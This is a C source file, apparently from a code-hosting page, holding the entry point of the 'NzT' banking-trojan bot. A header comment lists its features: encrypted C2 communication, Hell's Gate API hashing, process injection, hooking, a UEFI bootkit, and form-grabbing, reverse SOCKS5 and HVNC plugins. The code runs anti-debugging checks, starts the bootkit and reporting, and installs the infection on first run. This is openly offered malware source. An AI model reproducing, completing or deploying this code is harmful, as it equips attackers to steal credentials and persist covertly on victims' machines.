122 lines
2.6 KiB
C
122 lines
2.6 KiB
C
/*
|
|
* - CORE
|
|
* [X] - HTTP/HTTPS secure C2 communication
|
|
* - Server -> Generate RSA keypair
|
|
* - Client -> Generate AES keypair -> Encrypt with server RSA keypair
|
|
* - Client -> Encrypt data + keypair -> send AES keypair to server -> Server decrypts encrypted key, and decrypts data
|
|
* [X] - Dynamic hashed API calls (Hell's Gate)
|
|
* [X] - Dynamic configuration
|
|
* [X] - x86<=>x64 process injection
|
|
* [X] - Hooking engine
|
|
* [X] - Anti-Hooking engine
|
|
* [X] - Modular plugin system
|
|
* [X] - Store and encrypt strings in seperate PE section
|
|
* [X] - UEFI Kit
|
|
*
|
|
* - PLUGINS
|
|
* [X] Form Grabber
|
|
* [X] Reverse Socks5
|
|
* [X] HVNC
|
|
*/
|
|
#include <Windows.h>
|
|
|
|
#include "crt.h"
|
|
#include "nzt.h"
|
|
#include "globals.h"
|
|
#include "report.h"
|
|
#include "antidebug.h"
|
|
#include "injection.h"
|
|
#include "utils.h"
|
|
#include "guid.h"
|
|
#include "install.h"
|
|
#include "config.h"
|
|
|
|
NzT_T NzT;
|
|
|
|
int BookitInitialize();
|
|
|
|
static WINERROR BotInitialize()
|
|
{
|
|
WINERROR Status = NO_ERROR;
|
|
|
|
MemoryZero(&NzT, sizeof(NzT_T));
|
|
|
|
// Check if NzT has a debugger detached, DestroyOS if true
|
|
if (IsBeingDebugged())
|
|
{
|
|
DebugPrint("NzT: Possible debugging detected, exiting...");
|
|
return ERROR_UNSUCCESSFULL;
|
|
}
|
|
|
|
// Dynamically resolve all Windows API function by hash
|
|
if (!ApiInitialize())
|
|
{
|
|
DebugPrint("NzT: failed to initialize API!");
|
|
return ERROR_UNSUCCESSFULL;
|
|
}
|
|
|
|
// Make sure only one instance
|
|
if (!(g_MainMutex = API(CreateMutexW)(NULL, FALSE, L"g_MainMutex")) || ((Status = API(GetLastError)()) == ERROR_ALREADY_EXISTS))
|
|
{
|
|
Status = FALSE;
|
|
DebugPrint("NzT: Error Mutex already exists, NzT is already running!");
|
|
return ERROR_UNSUCCESSFULL;
|
|
}
|
|
|
|
// Initinalize global variables
|
|
if (!GlobalsInitialize(API(GetModuleHandleW(NULL)), G_SYSTEM_VERSION | G_CURRENT_PROCESS_ID | G_CURRENT_PROCESS_PATH))
|
|
{
|
|
DebugPrint("NzT: Failed to initialize globals!");
|
|
return ERROR_UNSUCCESSFULL;
|
|
}
|
|
|
|
DebugPrint("NzT: Initialized!");
|
|
|
|
// Start NzT EFI Bootkit
|
|
BookitInitialize();
|
|
|
|
#ifdef _REPORT
|
|
StartReportThread();
|
|
#endif
|
|
|
|
#ifdef _INSTALL
|
|
if (!IsSystemInfected())
|
|
{
|
|
NzT.Type = NEW_INFECTION;
|
|
InstallBot();
|
|
}
|
|
else
|
|
{
|
|
NzT.Type = RUNNING_INFECTION;
|
|
}
|
|
#endif
|
|
|
|
return Status;
|
|
}
|
|
|
|
WINERROR BotShutdown()
|
|
{
|
|
WINERROR Status = NO_ERROR;
|
|
|
|
DebugPrint("NzT: Shutdown initiated");
|
|
|
|
if (g_ShutdownEvent)
|
|
{
|
|
API(SetEvent)(g_ShutdownEvent);
|
|
}
|
|
|
|
if (g_MainMutex)
|
|
{
|
|
API(ReleaseMutex(g_MainMutex));
|
|
API(CloseHandle(g_MainMutex));
|
|
}
|
|
|
|
return Status;
|
|
}
|
|
|
|
INT EntryPoint()
|
|
{
|
|
BotInitialize();
|
|
return 0;
|
|
}
|